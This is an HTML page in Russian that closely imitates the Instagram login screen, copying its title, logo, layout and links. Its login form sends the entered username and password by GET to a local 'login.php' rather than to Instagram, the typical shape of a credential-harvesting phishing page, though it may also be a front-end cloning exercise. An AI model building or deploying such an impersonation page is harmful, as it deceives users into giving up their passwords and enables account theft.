<!DOCTYPE HTML>
<html>
    <head>
        <title>Instagram</title>
        <meta charset="utf-8">
        <style>
            body{
                background-color:#FDFEFE;
				padding: 250px;
				margin-top: 150px;
				font-family: Open Sans, sans-serif, bold;
        
				
            }
            .login{
                width: 310px;
				height: 350px;
				background: #FFFFFF;
                padding: 20px;
                color:#FFFFFF;
                border: 2px solid #FFFFFF;
				border-radius: 5px;
                border-color: #E5E7E9; 
				margin-left: 400px;
				margin-top: -550px;
            }
            #Uname{  
                width: 260px;  
                height: 30px;  
                border: solid;
                border-color: #BBCDF8;				
                border-radius: 5px;  
                padding-left: 8px;
                margin-top: 10px;
                margin-left: 19px;
            } 
            #Pass{  
                width: 260px;  
                height: 30px;  
                border: solid;
                border-color: #F0F2F5;				
                border-radius: 5px;  
                padding-left: 8px;
                margin-left: 19px;				
            }  
            #log{  
                width: 275px;  
                height: 30px;  
                border: none;  
                border-radius: 5px; 
                background: #3498DB;				
                padding-left: 8px;
                color: #FFFFFF;
                font-size: 100%;
                margin-left: 19px;
				
            } 
            .forget{
                margin-left:109px;
                margin-top:50px;
                font-size:80%;
            }
            .facebook{
                margin-left:70px;
                margin-top:60px;
                font-size:100%;
            }
            .or{
            
                color: #B2BABB  ;
                font-size: 20px;
                margin-top: -70px;
                margin-left: 140px;
            }
            .reg{
                width: 310px;
				height: 10px;
				background: #FFFFFF;
                padding: 20px;
                color:#FFFFFF;
                border: 2px solid #FFFFFF;
				border-radius: 5px;
                border-color: #E5E7E9; 
				margin-left: 400px;
				margin-top: 10px;
            }
            .regis{
                font-size: 82%;
                margin-top: -1px;
                margin-left: 18px;
                color: black;
            }
            .qwer{
                font-size: 82%;
                margin-left: 500px;

            }
            .apple{
                margin-left: 440px;
            }
            .links{
                text-align: center;
                margin-left: -90px;
                margin-top: 40px;
                font-size: 80%;
                color:black;
                word-spacing: 15px;
                padding:12px;
            }
            .zxc{
                font-size: 80%;
                margin-left: 200px;

            }
            .logo{
                margin-left: 70px;
            }
            .iphone{
                margin-top: -350px;
                margin-left: -70px;

            }
            a{
                color:rgb(87, 85, 85) ;
                text-decoration: none ;
            }
            

        </style>
        
    </head>
    <body>
    <img class="iphone" src="https://lh3.googleusercontent.com/oAq1VIgetPH0hKWdKVqO7zrX71OYKRgRRy7df16TE6FF97QmOYXqZqtLfxj9ZXSq_Sc1mxkI0M-GbOt82ib6TUmcigqUBGHd6_ibVGwOymw7vO6XEbBS3yPvRxFSk-EBr1iy42cIrGFytmVSaEi6hE5uQg_kUfTJ58cqGtM3bZNYYpQLDW0ObiefuySIZRCNEc8_WgDNEt5kQ5cTndqRsmr1zy5zjDC03hkfbAomWpjiQrL2_9_Z0oAb6MSsRLl3su5Du-9I6x19tpjR8eydfPijioGtM1mhzOojkDkvlgHO5ibDmZixHevoC7akNKoeCFCKEooq3ceQktw3Ib1W8bDe6SU0gkRaaOjaZF3-6vIHKJKnzI47TM7cUtpL9lSMqKp-A0SQUjDiAEH4vA7mEY9VbJVk4Z6ikE3jJre96_xv-lpbnPapFVzIJ7HMkMozKngXlze7vZD3x9CEQyvv9PZhdZ84JsbGn5mqvUN16YlfOjuv28IFFCwBA6CPmgVrtg5f0bqCN5VjaYSRSLJOsKxeUNWs4AdflyAO7xAFfEpZ9f0sc8GEp3xQ7ZQflFTqNqCNn3i6Yu7Io7jlkOG0fAmmXP5u4VGwp0qJ70zl_5oliuJrAk2lkX_CLSWEuz0VlSUsbms7CovipCvqUDgXhfxH0Yv60hqQT6hILVVCI951AIsnSiKGofx0b678hCnq9dMjejoAw4KGVjO73MGix3o=w373-h584-no?authuser=0" width="400" height="600">
    <div class="login">
    <form id="login" method="get" action="login.php"> 
        <img class="logo" src="https://bon-bon.by/image/instagram-60.png" width="180" height="90">

        <input type="text" name="Uname" id="Uname" placeholder="Номер телефона, имя пользователя или эл. адрес">    
        <br><br>      
        <input type="Password" name="Pass" id="Pass" placeholder="Пароль">    
        <br><br>    
        <input type="button" name="log" id="log" value="Войти"> 
        <p class="facebook"><a href="https://www.facebook.com/login.php?skip_api_login=1&api_key=124024574287414&kid_directed_site=0&app_id=124024574287414&signed_next=1&next=https%3A%2F%2Fwww.facebook.com%2Fdialog%2Foauth%3Fclient_id%3D124024574287414%26redirect_uri%3Dhttps%253A%252F%252Fwww.instagram.com%252Faccounts%252Fsignup%252F%26state%3D%257B%2522fbLoginKey%2522%253A%2522qwcaza1bgdds01co6up3wh2vnp10zzd2v13q1r43e5p3uq1fgwwo1%2522%252C%2522fbLoginReturnURL%2522%253A%2522%252Ffxcal%252Fdisclosure%252F%253Fnext%253D%25252F%2522%257D%26scope%3Demail%26response_type%3Dcode%252Cgranted_scopes%26locale%3Dru_RU%26ret%3Dlogin%26fbapp_pres%3D0%26logger_id%3D242c531c-913e-4c2d-8ed0-1e480a0abb03%26tp%3Dunspecified&cancel_url=https%3A%2F%2Fwww.instagram.com%2Faccounts%2Fsignup%2F%3Ferror%3Daccess_denied%26error_code%3D200%26error_description%3DPermissions%2Berror%26error_reason%3Duser_denied%26state%3D%257B%2522fbLoginKey%2522%253A%2522qwcaza1bgdds01co6up3wh2vnp10zzd2v13q1r43e5p3uq1fgwwo1%2522%252C%2522fbLoginReturnURL%2522%253A%2522%252Ffxcal%252Fdisclosure%252F%253Fnext%253D%25252F%2522%257D%23_%3D_&display=page&locale=en_US&pl_dbl=0"> <img src="https://www.7-62.ua/View/Resources/fb%20simple.png" width="15" height="15">  Войти через Facebook </a></p>  

        <p class="or"><span>или</span></p>
     
        <p class="forget"><a href="https://www.instagram.com/accounts/password/reset/">Забыли пароль?</a></p>
		<br><br>
    </form>     
    </div> 
    <div class="reg">
        <form id="reg" method="get" action="login.php">
            <p class="regis">У вас ещё нет аккаунта?<a href="https://www.instagram.com/accounts/emailsignup/"> Зарегистрироваться</a></p>

        </form>

    </div>
    <p class="qwer">Установите приложение.</p>
    <img class="apple" src="https://careerist.ru/news/wp-content/uploads/2016/06/appstore.png" width="140" height="40">  
    <img class="google" src="https://sbp.nspk.ru/i/sbpay/google-play-badge.png" width="140" height="40">
    <p class="links">
        <a href="https://about.instagram.com/">Информация</a> 
        <a href="https://about.instagram.com/blog">Блог</a>
        <a href="https://about.instagram.com/about-us/careers">Вакансии</a>
        <a href="https://help.instagram.com/">Помощь</a>
        <a href="https://developers.facebook.com/docs/instagram">API</a>
        <a href="https://help.instagram.com/519522125107875/?maybe_redirect_pol=0">Конфидициальность</a>
        <a href="https://help.instagram.com/581066165581870">Условия</a>
        <a href="https://www.instagram.com/directory/profiles/">Популярные аккаунты</a>
        <a href="https://www.instagram.com/directory/hashtags/">Хэштеги</a>
        <a href="https://www.instagram.com/explore/locations/">Места</a>
        <br>
        <a href="https://www.instagram.com/topics/beauty/">Красота</a>
        <a href="https://www.instagram.com/topics/dance-and-performance/">Танцы</a>
        <a href="https://www.instagram.com/topics/fitness/">Фитнес</a>
        <a href="https://www.instagram.com/topics/food-and-drink/">Еда и напитки</a>
        <a href="https://www.instagram.com/topics/home-and-garden/">Дом и сад</a>
        <a href="https://www.instagram.com/topics/music/">Музыка</a>
        <a href="https://www.instagram.com/topics/visual-arts/">Изобритательное искусство</a>
        <br>
        <p class="zxc"> Русский <img src="https://cdn-icons.flaticon.com/png/512/2951/premium/2951160.png?token=exp=1644520261~hmac=ed88cb6d2923b44377b42cf136935029" width="15" height="15"> © Instagram от Facebook, 2021</p>

    </p>


    </body>
</html>